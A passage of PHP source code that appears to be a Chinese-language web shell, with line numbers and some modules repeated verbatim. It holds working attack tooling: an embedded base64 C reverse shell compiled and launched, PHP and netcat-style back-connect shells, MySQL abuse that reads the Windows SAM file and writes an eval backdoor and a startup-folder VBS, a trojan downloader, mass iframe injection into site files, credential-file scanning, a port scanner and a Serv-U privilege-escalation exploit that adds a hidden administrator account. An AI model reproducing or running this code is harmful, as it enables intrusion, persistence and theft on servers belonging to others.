482 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
483 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
484 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
485 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
486 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
487 echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/envl_bc.c成功<br>' : '创建/tmp/envl_bc.c失败<br>';
488 $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
489 @unlink('/tmp/envl_bc.c');
490 echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败';
491 }
492 if($_POST['use'] == 'php')
493 {
494 if(!extension_loaded('sockets'))
495 {
496 if ($system == 'WIN') {
497 @dl('php_sockets.dll') or die("Can't load socket");
498 }else{
499 @dl('sockets.so') or die("Can't load socket");
500 }
501 }
502 if($system=="WIN")
503 {
504 $env=array('path' => 'c:\\windows\\system32');
505 }else{
506 $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
507 }
508 $descriptorspec = array(
509 0 => array("pipe","r"),
510 1 => array("pipe","w"),
511 2 => array("pipe","w"),
512 );
513 $host = $_POST['yourip'];
514 $port = $_POST['yourport'];
515 $host=gethostbyname($host);
516 $proto=getprotobyname("tcp");
517 if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){
518 die("Socket创建失败");
519 }
520 if(($ret=socket_connect($sock,$host,$port))<0){
521 die("连接失败");
522 }else{
523 $message="----------------------PHP反弹连接--------------------\n";
524 socket_write($sock,$message,strlen($message));
525 $cwd=str_replace('\\','/',dirname(__FILE__));
526 while($cmd=socket_read($sock,65535,$proto)){
527 if(trim(strtolower($cmd))=="exit"){
528 socket_write($sock,"Bye\n");
529 exit;
530 }else{
531 $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
532 if (is_resource($process)) {
533 fwrite($pipes[0], $cmd);
534 fclose($pipes[0]);
535 $msg=stream_get_contents($pipes[1]);
536 socket_write($sock,$msg,strlen($msg));
537 fclose($pipes[1]);
538 $msg=stream_get_contents($pipes[2]);
539 socket_write($sock,$msg,strlen($msg));
540 $return_value = proc_close($process);
541 }
542 }
543 }
544 }
545 }
546 if($_POST['use'] == 'nc')
547 {
548 echo '<div class="actall">';
549 $mip=$_POST['yourip'];
550 $bport=$_POST['yourport'];
551 $fp=fsockopen($mip , $bport , $errno, $errstr);
552 if (!$fp){
553 $result = "Error: could not open socket connection";
554 }else {
555 fputs ($fp ,"\n*********************************************\n
556 hacking url:http://www.google.com is ok!
557 \n*********************************************\n\n");
558 while(!feof($fp)){
559 fputs ($fp," [r00t@yzddmr6:/root]# ");
560 $result= fgets ($fp, 4096);
561 $message=`$result`;
562 fputs ($fp,"--> ".$message."\n");
563 }
564 fclose ($fp);
565 }
566 echo '</div>';
567 }
568
569 echo '<br>你可以尝试连接端口 (nc -vv -l '.$_POST['yourport'].') ';
570 }
571break;
572
573 case "sqlshell":
574 $MSG_BOX = '';
575 $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
576 if(isset($_POST['mhost']) && isset($_POST['muser']))
577 {
578 $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
579 if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
580 else $MSG_BOX = '连接MYSQL失败';
581 }
582 $downfile = 'c:/windows/repair/sam';
583 if(!empty($_POST['downfile']))
584 {
585 $downfile = File_Str($_POST['downfile']);
586 $binpath = bin2hex($downfile);
587 $query = 'select load_file(0x'.$binpath.')';
588 if($result = @mysql_query($query,$conn))
589 {
590 $k = 0; $downcode = '';
591 while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
592 $filedown = basename($downfile);
593 if(!$filedown) $filedown = 'envl.tmp';
594 $array = explode('.', $filedown);
595 $arrayend = array_pop($array);
596 header('Content-type: application/x-'.$arrayend);
597 header('Content-Disposition: attachment; filename='.$filedown);
598 header('Content-Length: '.strlen($downcode));
599 echo $downcode;
600 exit;
601 }
602 else $MSG_BOX = '下载文件失败';
603 }
604 $o = isset($_GET['o']) ? $_GET['o'] : '';
605print<<<END
606<script language="javascript">
607function nFull(i){
608 Str = new Array(11);
609 Str[0] = "select version();";
610 Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
611 Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
612 Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
613 nform.msql.value = Str[i];
614 return true;
615}
616END;
617html_base();
618print<<<END
619function SubmitUrl(){
620 document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
621 document.getElementById('nform').submit();
622}
623</script>
624<form method="POST" name="nform" id="nform">
625<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL执行语句]</a>
626<a href="?eanver=sqlshell&o=u">[MYSQL上传文件]</a>
627<a href="?eanver=sqlshell&o=d">[MYSQL下载文件]</a></div>
628<div class="actall">
629地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
630端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
631用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
632密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
633库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
634</div>
635<div class="actall" style="height:220px;">
636END;
637if($o == 'u')
638{
639 $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
640 if(!empty($_POST['uppath']))
641 {
642 $uppath = $_POST['uppath'];
643 $query = 'Create TABLE a (cmd text NOT NULL);';
644 if(@mysql_query($query,$conn))
645 {
646 if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
647 else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
648 $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
649 if(@mysql_query($query,$conn))
650 {
651 $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
652 $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
653 }
654 else $MSG_BOX = '插入临时表失败';
655 @mysql_query('Drop TABLE IF EXISTS a;',$conn);
656 }
657 else $MSG_BOX = '创建临时表失败';
658 }
659print<<<END
660<br><br>上传路径 <input type="text" name="uppath" value="{$uppath}" style="width:500px">
661<br><br>选择文件 <input type="file" name="upfile" style="width:500px;height:22px;">
662</div><div class="actall"><input type="submit" value="上传" style="width:80px;">
663END;
664}
665elseif($o == 'd')
666{
667print<<<END
668<br><br><br>下载文件 <input type="text" name="downfile" value="{$downfile}" style="width:500px">
669</div><div class="actall"><input type="submit" value="下载" style="width:80px;">
670END;
671}
672else
673{
674 if(!empty($_POST['msql']))
675 {
676 $msql = $_POST['msql'];
677 $msql = base64_decode($msql);
678 if($result = @mysql_query($msql,$conn))
679 {
680 $MSG_BOX = '执行SQL语句成功<br>';
681 $k = 0;
682 while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
683 }
684 else $MSG_BOX .= mysql_error();
685 }
686print<<<END
687<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
688<div class="actall">
689<select onchange="return nFull(options[selectedIndex].value)">
690 <option value="0" selected>显示版本</option>
691 <option value="1">导出文件</option>
692 <option value="2">写入文件</option>
693 <option value="3">开启外连</option>
694</select>
695<input type="button" value="执行" onclick="SubmitUrl();" style="width:80px;">
696END;
697}
698 if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
699 else echo '</div></center></form>';
700 break;
701
702 case "downloader":
703 $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
704 $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
705print<<<END
706 <form method="POST">
707 <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
708 <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
709 <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
710END;
711 if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
712 {
713 echo '<div class="actall">';
714 $contents = @file_get_contents($_POST['durl']);
715 if(!$contents) echo '无法读取要下载的数据';
716 else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
717 echo '</div>';
718 }
719 break;
720
721 case "issql":
722 session_start();
723 if($_POST['sqluser'] && $_POST['sqlpass']){
724 $_SESSION['sql_user'] = $_POST['sqluser'];
725 $_SESSION['sql_password'] = $_POST['sqlpass'];
726 }
727 if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
728 else{$_SESSION['sql_host'] = 'localhost';}
729 if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
730 else{$_SESSION['sql_port'] = '3306';}
731 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
732 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
733 unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
734 die(html_a('?eanver=sqlshell','连接失败请返回'));
735 }
736 }
737 else{
738 die(html_a('?eanver=sqlshell','连接失败请返回'));
739 }
740 $query = mysql_query("SHOW DATABASES",$sqlcon);
741 html_n('<tr><td>数据库列表:');
742 while($db = mysql_fetch_array($query)) {
743 html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
744 echo ' ';
745 }
746 html_n('</td></tr>');
747 if($_GET['db']){
748 css_js("3");
749 mysql_select_db($_GET['db'], $sqlcon);
750 html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
751 html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
752 html_input("submit","doquery","执行");
753 html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
754 html_n('--->');
755 html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
756 html_n('</form><br>');
757 if(!empty($_POST['sql'])){
758 if (@mysql_query($_POST['sql'],$sqlcon)) {
759 echo "执行SQL语句成功";
760 }else{
761 echo "出错: ".mysql_error();
762 }
763 }
764 if($_GET['table']){
765 html_n('<table border=1><tr>');
766 $query = "SHOW COLUMNS FROM ".$_GET['table'];
767 $result = mysql_query($query,$sqlcon);
768 $fields = array();
769 while($row = mysql_fetch_assoc($result)){
770 array_push($fields,$row['Field']);
771 html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
772 }
773 html_n('</tr><tr>');
774 $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
775 while($text = @mysql_fetch_assoc($result)){
776 foreach($fields as $row){
777 if($text[$row] == "") $text[$row] = 'NULL';
778 html_n('<td>'.$text[$row].'</td>');
779 }
780 echo '</tr>';
781 }
782 }
783 else{
784 $query = "SHOW TABLES FROM " . $_GET['db'];
785 $dat = mysql_query($query, $sqlcon) or die(mysql_error());
786 while ($row = mysql_fetch_row($dat)){
787 html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
788 }
789 }
790 }
791 break;
792
793 case "downloader":
794 $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
795 $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
796print<<<END
797 <form method="POST">
798 <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
799 <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
800 <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
801END;
802 if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
803 {
804 echo '<div class="actall">';
805 $contents = @file_get_contents($_POST['durl']);
806 if(!$contents) echo '无法读取要下载的数据';
807 else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
808 echo '</div>';
809 }
810 break;
811
812 case "issql":
813 session_start();
814 if($_POST['sqluser'] && $_POST['sqlpass']){
815 $_SESSION['sql_user'] = $_POST['sqluser'];
816 $_SESSION['sql_password'] = $_POST['sqlpass'];
817 }
818 if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
819 else{$_SESSION['sql_host'] = 'localhost';}
820 if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
821 else{$_SESSION['sql_port'] = '3306';}
822 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
823 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
824 unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
825 die(html_a('?eanver=sqlshell','连接失败请返回'));
826 }
827 }
828 else{
829 die(html_a('?eanver=sqlshell','连接失败请返回'));
830 }
831 $query = mysql_query("SHOW DATABASES",$sqlcon);
832 html_n('<tr><td>数据库列表:');
833 while($db = mysql_fetch_array($query)) {
834 html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
835 echo ' ';
836 }
837 html_n('</td></tr>');
838 if($_GET['db']){
839 css_js("3");
840 mysql_select_db($_GET['db'], $sqlcon);
841 html_n('<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
842 html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
843 html_input("submit","doquery","执行");
844 html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
845 html_n('--->');
846 html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
847 html_n('</form><br>');
848 if(!empty($_POST['sql'])){
849 if (@mysql_query($_POST['sql'],$sqlcon)) {
850 echo "执行SQL语句成功";
851 }else{
852 echo "出错: ".mysql_error();
853 }
854 }
855 if($_GET['table']){
856 html_n('<table border=1><tr>');
857 $query = "SHOW COLUMNS FROM ".$_GET['table'];
858 $result = mysql_query($query,$sqlcon);
859 $fields = array();
860 while($row = mysql_fetch_assoc($result)){
861 array_push($fields,$row['Field']);
862 html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
863 }
864 html_n('</tr><tr>');
865 $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
866 while($text = @mysql_fetch_assoc($result)){
867 foreach($fields as $row){
868 if($text[$row] == "") $text[$row] = 'NULL';
869 html_n('<td>'.$text[$row].'</td>');
870 }
871 echo '</tr>';
872 }
873 }
874 else{
875 $query = "SHOW TABLES FROM " . $_GET['db'];
876 $dat = mysql_query($query, $sqlcon) or die(mysql_error());
877 while ($row = mysql_fetch_row($dat)){
878 html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
879 }
880 }
881 }
882 break;
883
884 case "upfiles":
885 html_n('<tr><td>服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
886 html_input("text","uppath",root_dir,"<br>上传到路径: ","51");
887print<<<END
888<SCRIPT language="JavaScript">
889function addTank(){
890var k=0;
891 k=k+1;
892 k=tank.rows.length;
893 newRow=document.all.tank.insertRow(-1)
894 <!--删除选择-->
895 newcell=newRow.insertCell()
896 newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
897}
898
899function delTank() {
900 if(tank.rows.length==1) return;
901 var checkit = false;
902 for (var i=0;i<document.all.tankNo.length;i++) {
903 if (document.all.tankNo[i].checked) {
904 checkit=true;
905 tank.deleteRow(i+1);
906 i--;
907 }
908 }
909 if (checkit) {
910 } else{
911 alert("请选择一个要删除的对象");
912 return false;
913 }
914}
915</SCRIPT>
916<br><br>
917<table cellSpacing=0 cellPadding=0 width="100%" border=0>
918 <tr>
919 <td width="7%"><input class="button01" type="button" onclick="addTank()" value=" 添 加 " name="button2"/>
920 <input name="button3" type="button" class="button01" onClick="delTank()" value="删除" />
921 </td>
922 </tr>
923</table>
924<table id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
925<tr><td>请选择要上传的文件:</td></tr>
926<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
927</table>
928END;
929 html_n('<br><input type="submit" name="upfiles" value="上传" style="width:80px;"> <input type="button" value="返回" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
930 if($_POST['upfiles']){
931 foreach ($_FILES["upfile"]["error"] as $key => $error){
932 if ($error == UPLOAD_ERR_OK){
933 $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
934 $name = $_FILES["upfile"]["name"][$key];
935 $uploadfile = str_path($_POST['uppath'].'/'.$name);
936 $upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
937 echo '<br><br>'.$upload;
938 }
939 }
940 }
941 html_n('</form>');
942 break;
943
944 case "guama":
945 $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
946 $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
947 $codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
948 html_n('<tr><td>文件类型请用"|"隔开,也可以是指定文件名.<form method="POST"><br>');
949 html_input("text","path",$patht,"路径范围","45");
950 html_input("checkbox","pass","","使用目录遍历","",true);
951 html_input("text","type",$typet,"<br><br>文件类型","60");
952 html_text("code","67","5",$codet);
953 html_n('<br><br>');
954 html_radio("批量挂马","批量清马","guama","qingma");
955 html_input("submit","passreturn","开始");
956 html_n('</td></tr></form>');
957 if(!empty($_POST['path'])){
958 html_n('<tr><td>目标文件:<br><br>');
959 if(isset($_POST['pass'])) $bool = true; else $bool = false;
960 do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
961 }
962 break;
963
964 case "tihuan":
965 html_n('<tr><td>此功能可批量替换文件内容,请小心使用.<br><br><form method="POST">');
966 html_input("text","path",root_dir,"路径范围","45");
967 html_input("checkbox","pass","","使用目录遍历","",true);
968 html_text("newcode","67","5",$_POST['newcode']);
969 html_n('<br><br>替换为');
970 html_text("oldcode","67","5",$_POST['oldcode']);
971 html_input("submit","passreturn","替换","<br><br>");
972 html_n('</td></tr></form>');
973 if(!empty($_POST['path'])){
974 html_n('<tr><td>目标文件:<br><br>');
975 if(isset($_POST['pass'])) $bool = true; else $bool = false;
976 do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
977 }
978 break;
979
980 case "scanfile":
981 css_js("4");
982 html_n('<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method="POST" name="sform"><br>');
983 html_input("text","path",root_dir,"路径名","45");
984 html_input("checkbox","pass","","使用目录遍历","",true);
985 html_input("text","code",$_POST['code'],"<br><br>关键字","40");
986 html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
987 html_n('<br><br>');
988 html_radio("搜索文件名","搜索包含文字","scanfile","scancode");
989 html_input("submit","passreturn","搜索");
990 html_n('</td></tr></form>');
991 if(!empty($_POST['path'])){
992 html_n('<tr><td>找到文件:<br><br>');
993 if(isset($_POST['pass'])) $bool = true; else $bool = false;
994 do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
995 }
996 break;
997
998 case "scanphp":
999 html_n('<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method="POST"><br>');
1000 html_input("text","path",root_dir,"查找范围","40");
1001 html_input("checkbox","pass","","使用目录遍历<br><br>脚本类型","",true);
1002 html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
1003 html_input("submit","passreturn","查找","<br><br>");
1004 html_n('</td></tr></form>');
1005 if(!empty($_POST['path'])){
1006 html_n('<tr><td>找到文件:<br><br>');
1007 if(isset($_POST['pass'])) $bool = true; else $bool = false;
1008 do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
1009 }
1010 break;
1011
1012 case "port":
1013 $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
1014 $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|8080|43958|5631|2049|873|999';
1015print<<<END
1016<form method="POST">
1017<div class="actall">扫描IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
1018<div class="actall">端口号 <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
1019<div class="actall"><input type="submit" value="扫描" style="width:80px;"></div>
1020</form>
1021END;
1022 if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
1023 {
1024 echo '<div class="actall">';
1025 $ports = explode('|', $_POST['port']);
1026 for($i = 0;$i < count($ports);$i++)
1027 {
1028 $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
1029 echo $fp ? '<font color="#FF0000">开放端口 ---> '.$ports[$i].'</font><br>' : '关闭端口 ---> '.$ports[$i].'<br>';
1030 ob_flush();
1031 flush();
1032 }
1033 echo '</div>';
1034 }
1035 break;
1036
1037
1038 case "getcode":
1039if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit;}
1040print<<<END
1041<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
1042 <form method="POST" target="proxyframe">
1043 <tr class="firstalt">
1044 <td align="center"><b>在线代理</b></td>
1045 </tr>
1046 <tr class="secondalt">
1047 <td align="center" ><br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}</li></ul></td>
1048 </tr>
1049 <tr class="firstalt">
1050 <td align="center" height=40 >URL: <input name="url" value="about:blank" type="text" class="input" size="100" >
1051 <input name="" value="浏览" type="submit" class="input" size="30" >
1052</td>
1053 </tr>
1054 <tr class="secondalt">
1055 <td align="center" ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
1056 </tr>
1057</form></table>
1058END;
1059 break;
1060
1061 case "servu":
1062 $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
1063print<<<END
1064<div class="actall"><a href="?eanver=servu">[执行命令]</a> <a href="?eanver=servu&o=adduser">[添加用户]</a></div>
1065<form method="POST">
1066 <div class="actall">ServU端口 <input name="SUPort" type="text" value="43958" style="width:300px"></div>
1067 <div class="actall">ServU用户 <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
1068 <div class="actall">ServU密码 <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
1069END;
1070if($_GET['o'] == 'adduser')
1071{
1072print<<<END
1073<div class="actall">帐号 <input name="user" type="text" value="mysql$" style="width:200px">
1074密码 <input name="password" type="text" value="envl" style="width:200px">
1075目录 <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
1076END;
1077}
1078else
1079{
1080print<<<END
1081<div class="actall">提权命令 <input name="SUCommand" type="text" value="net user mysql$ envl /add & net localgroup administrators mysql$ /add" style="width:600px"><br>
1082<input name="user" type="hidden" value="envl">
1083<input name="password" type="hidden" value="envl">
1084<input name="part" type="hidden" value="C:\\\\"></div>
1085END;
1086}
1087echo '<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>';
1088 if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
1089 {
1090 echo '<div class="actall">';
1091 $sendbuf = "";
1092 $recvbuf = "";
1093 $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
1094 $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
1095 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
1096 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
1097 $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
1098 $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
1099 $recvbuf = @fgets($sock, 1024);
1100 echo "返回数据包: $recvbuf <br>";
1101 $sendbuf = "USER ".$_POST["SUUser"]."\r\n";
1102 @fputs($sock, $sendbuf, strlen($sendbuf));
1103 echo "发送数据包: $sendbuf <br>";
1104 $recvbuf = @fgets($sock, 1024);
1105 echo "返回数据包: $recvbuf <br>";
1106 $sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
1107 @fputs($sock, $sendbuf, strlen($sendbuf));
1108 echo "发送数据包: $sendbuf <br>";
1109 $recvbuf = @fgets($sock, 1024);
1110 echo "返回数据包: $recvbuf <br>";
1111 $sendbuf = "SITE MAINTENANCE\r\n";
1112 @fputs($sock, $sendbuf, strlen($sendbuf));
1113 echo "发送数据包: $sendbuf <br>";
1114 $recvbuf = @fgets($sock, 1024);
1115 echo "返回数据包: $recvbuf <br>";
1116 $sendbuf = $domain;
1117 @fputs($sock, $sendbuf, strlen($sendbuf));
1118 echo "发送数据包: $sendbuf <br>";
1119 $recvbuf = @fgets($sock, 1024);
1120 echo "返回数据包: $recvbuf <br>";
1121 $sendbuf = $adduser;
1122 @fputs($sock, $sendbuf, strlen($sendbuf));
1123 echo "发送数据包: $sendbuf <br>";
1124 $recvbuf = @fgets($sock, 1024);
1125 echo "返回数据包: $recvbuf <br>";
1126 if(!empty($_POST['SUCommand']))
1127 {
1128 $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
1129 $recvbuf = @fgets($exp, 1024);
1130 echo "返回数据包: $recvbuf <br>";
1131 $sendbuf = "USER ".$_POST['user']."\r\n";
1132 @fputs($exp, $sendbuf, strlen($sendbuf));
1133 echo "发送数据包: $sendbuf <br>";
1134 $recvbuf = @fgets($exp, 1024);
1135 echo "返回数据包: $recvbuf <br>";
1136 $sendbuf = "PASS ".$_POST['password']."\r\n";
1137 @fputs($exp, $sendbuf, strlen($sendbuf));
1138 echo "发送数据包: $sendbuf <br>";
1139 $recvbuf = @fgets($exp, 1024);
1140 echo "返回数据包: $recvbuf <br>";
1141 $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
